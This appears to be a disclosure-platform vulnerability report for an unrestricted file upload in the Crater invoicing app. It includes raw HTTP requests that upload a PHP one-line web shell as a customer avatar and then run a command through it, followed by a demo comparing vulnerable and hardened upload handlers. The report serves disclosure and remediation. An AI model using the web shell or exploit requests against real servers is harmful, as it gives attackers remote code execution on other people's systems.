Unrestricted Upload of File with Dangerous Type in crater-invoice/crater
Valid
Reported on
Jan 12th 2022
Description
In the current Crater release (commit e3f3809f, tag 6.0.1), a customer with the customer portal enabled can upload a PHP file instead of an avatar image: the profile endpoint does not restrict the uploaded file type, and the file is stored under the web-served /storage path, where PHP executes it.
Proof of Concept
POST /api/v1/company-name/customer/profile HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
company: 1
X-XSRF-TOKEN: eyJpdiI6Ikx4QXV1aFRmR041UnlLUDB2ZVpMcVE9PSIsInZhbHVlIjoidUtEdlM2NGVwZzY5VzJVK2VDOXNzaEFERVhURHV4bXVFdksxY0VseTNkOG1ocUJQdWR1TDJzUzEvVHV1YXlHa1dBQ2pJdEticjZtKzdSK0VWREFwTVMwWU1OZDI2cXBJTXpsTGROMk1PSkhXeHFUNFJBS1FNRkpSS2dPVjl0TnIiLCJtYWMiOiI5OTNmZDk5YjdjMDY1MDdjYTI2ZGVjZDk4YzFkODE4ZGE4MjM3YTFjZmFkYjcxODc2ZTMzMGZiZDgwY2U1NGE3IiwidGFnIjoiIn0=
Content-Type: multipart/form-data; boundary=---------------------------5158019571396084471843173425
Content-Length: 496
Origin: http://172.17.0.1:8888
DNT: 1
Connection: close
Referer: http://172.17.0.1:8888/company-name/customer/settings/customer-profile
Cookie: XSRF-TOKEN=eyJpdiI6Ikx4QXV1aFRmR041UnlLUDB2ZVpMcVE9PSIsInZhbHVlIjoidUtEdlM2NGVwZzY5VzJVK2VDOXNzaEFERVhURHV4bXVFdksxY0VseTNkOG1ocUJQdWR1TDJzUzEvVHV1YXlHa1dBQ2pJdEticjZtKzdSK0VWREFwTVMwWU1OZDI2cXBJTXpsTGROMk1PSkhXeHFUNFJBS1FNRkpSS2dPVjl0TnIiLCJtYWMiOiI5OTNmZDk5YjdjMDY1MDdjYTI2ZGVjZDk4YzFkODE4ZGE4MjM3YTFjZmFkYjcxODc2ZTMzMGZiZDgwY2U1NGE3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InN5YS95WTdzcTR1MlRnUmdFTk1OMVE9PSIsInZhbHVlIjoic0FkYzkrUmxHR3NGcThKZWJqZmVPKzdvYWZJelV2WVdjVjgwVmc3VFNEVzlBL1hCTG9LaHlqYUNHbm9oQldPNGNZbkxtYWVxVUZQT0RrTVN3bXo3bDcvOG55UXh6anN4Q2F0VVcyeW5nOFFHYkl3b05STmlEL1RCekVEdElkUzIiLCJtYWMiOiJjZjIxNjYzYjBjZmQ3ZjQxY2ZkY2IzZDllZGUwYjRjN2UzOTI3NDQxZWVlZDU0YjQ4ZmYzOTQxZTc3ZDRjYjViIiwidGFnIjoiIn0%3D; CRheUEen6HBSalAVkV3sV0y6xmAshdCCeNATWiuZ=(...)

-----------------------------5158019571396084471843173425
Content-Disposition: form-data; name="name"

customer
-----------------------------5158019571396084471843173425
Content-Disposition: form-data; name="email"

customer-crater@zaqwsx.cc
-----------------------------5158019571396084471843173425
Content-Disposition: form-data; name="customer_avatar"; filename="s.php"
Content-Type: application/x-php

<?=`$_GET[1]`?>
-----------------------------5158019571396084471843173425--
In the response, the URL of the uploaded file is returned in data->avatar:
{
"data":
{
"id": 1,
"name": "customer",
"email": "customer-crater@zaqwsx.cc",
"phone": null,
...
"avatar": "http:\/\/172.17.0.1:8888\/storage\/33\/s.php",
"prefix": null,
...
}
}
GET /storage/33/s.php?1=id HTTP/1.1
Host: 172.17.0.1:8888
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Cookie: (...)
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Host: 172.17.0.1:8888
Date: Wed, 12 Jan 2022 17:18:57 GMT
Connection: close
X-Powered-By: PHP/7.4.27
Content-type: text/html; charset=UTF-8

uid=1000(x) gid=1000(x) groups=1000(x),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lpadmin),126(sambashare),127(vboxusers),999(docker)
Impact
High severity: any authenticated customer-portal user can upload a PHP file that is stored under the web-served /storage path and executed on request, giving remote code execution as the web server user (uid=1000 in the PoC above).
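The following is an added example, not code from Crater, showing the handler pattern that makes this bug possible next to a hardened version that decides by file content rather than by the client-supplied filename and Content-Type (the two fields the PoC controls). The function names, the ALLOWED_IMAGE_TYPES allowlist, the 2 MiB size limit and the embedded 1x1 PNG are assumptions chosen for the demo; it runs stand-alone with the php CLI and needs only the fileinfo extension that ships with PHP.

```php
<?php
// Added example: not Crater's code. A vulnerable-style avatar store next to a
// hardened one that trusts neither the client's filename nor its Content-Type.
// Function names, allowlist, limit and the sample PNG are assumptions.
declare(strict_types=1);

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/webp' => 'webp',
];

// Vulnerable pattern: the client-supplied filename decides what lands on disk,
// so filename="s.php" is stored as s.php and runs if the directory is served by PHP.
function storeAvatarTrustingClient(string $tmpPath, string $clientName, string $dir): string
{
    $dest = $dir . '/' . basename($clientName);
    rename($tmpPath, $dest);          // move_uploaded_file() in a real request handler
    return $dest;
}

// Hardened pattern: sniff the bytes, require a decodable image, and derive the
// extension from the detected type, under a random name the client never sees.
function storeAvatarValidated(string $tmpPath, string $dir, int $maxBytes = 2 * 1024 * 1024): string
{
    $size = filesize($tmpPath);
    if ($size === false || $size === 0 || $size > $maxBytes) {
        throw new InvalidArgumentException('avatar size out of range');
    }
    // libmagic looks at the content; the client's Content-Type header is ignored.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if ($detected === false || !isset(ALLOWED_IMAGE_TYPES[$detected])) {
        throw new InvalidArgumentException('avatar is not an allowed image type (detected: ' . var_export($detected, true) . ')');
    }
    // Second opinion from the image parser. Like finfo it only reads headers, so a
    // valid PNG with PHP appended still passes both checks; what neutralizes such a
    // polyglot is the forced extension below plus a web server that does not run
    // scripts from the storage directory.
    if (@getimagesize($tmpPath) === false) {
        throw new InvalidArgumentException('avatar does not decode as an image');
    }
    $dest = $dir . '/' . bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$detected];
    rename($tmpPath, $dest);
    return $dest;
}

// --- demo with constructed inputs ---
$dir = sys_get_temp_dir() . '/avatar-demo-' . bin2hex(random_bytes(4));
mkdir($dir);

// The PoC payload from the report, as the upload body.
$phpPayload = '<?=`$_GET[1]`?>';
// A constructed 1x1 transparent PNG standing in for a legitimate avatar.
$png = base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVR42mNkYPhfDwAChwGA60e6kgAAAABJRU5ErkJggg==');

foreach ([['s.php', $phpPayload], ['avatar.png', $png]] as [$clientName, $bytes]) {
    $tmp = tempnam($dir, 'upl');
    file_put_contents($tmp, $bytes);
    printf("%-10s trusting client -> %s\n", $clientName, basename(storeAvatarTrustingClient($tmp, $clientName, $dir)));

    $tmp = tempnam($dir, 'upl');
    file_put_contents($tmp, $bytes);
    try {
        printf("%-10s validated       -> %s\n", $clientName, basename(storeAvatarValidated($tmp, $dir)));
    } catch (InvalidArgumentException $e) {
        printf("%-10s validated       -> rejected: %s\n", $clientName, $e->getMessage());
        unlink($tmp);
    }
}
```

In a Laravel handler the same split applies: getClientMimeType() and getClientOriginalExtension() return exactly the application/x-php and s.php the PoC sends, while the mimes: validation rule and UploadedFile::extension() work from the sniffed content. Independently of validation, the directory that /storage maps to should have no PHP handler configured, so that a file that slips through is served as bytes rather than executed.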
We are processing your report and will contact the crater-invoice/crater team within 24 hours. (a year ago)
We have contacted a member of the crater-invoice/crater team and are waiting to hear back. (a year ago)
We have sent a follow up to the crater-invoice/crater team. We will try again in 7 days. (a year ago)
The fix bounty has been dropped
This vulnerability will not receive a CVE
@maintainer @admin the commit mentioned above does not fix the bug. I created a PR with a proper fix: https://github.com/crater-invoice/crater/pull/732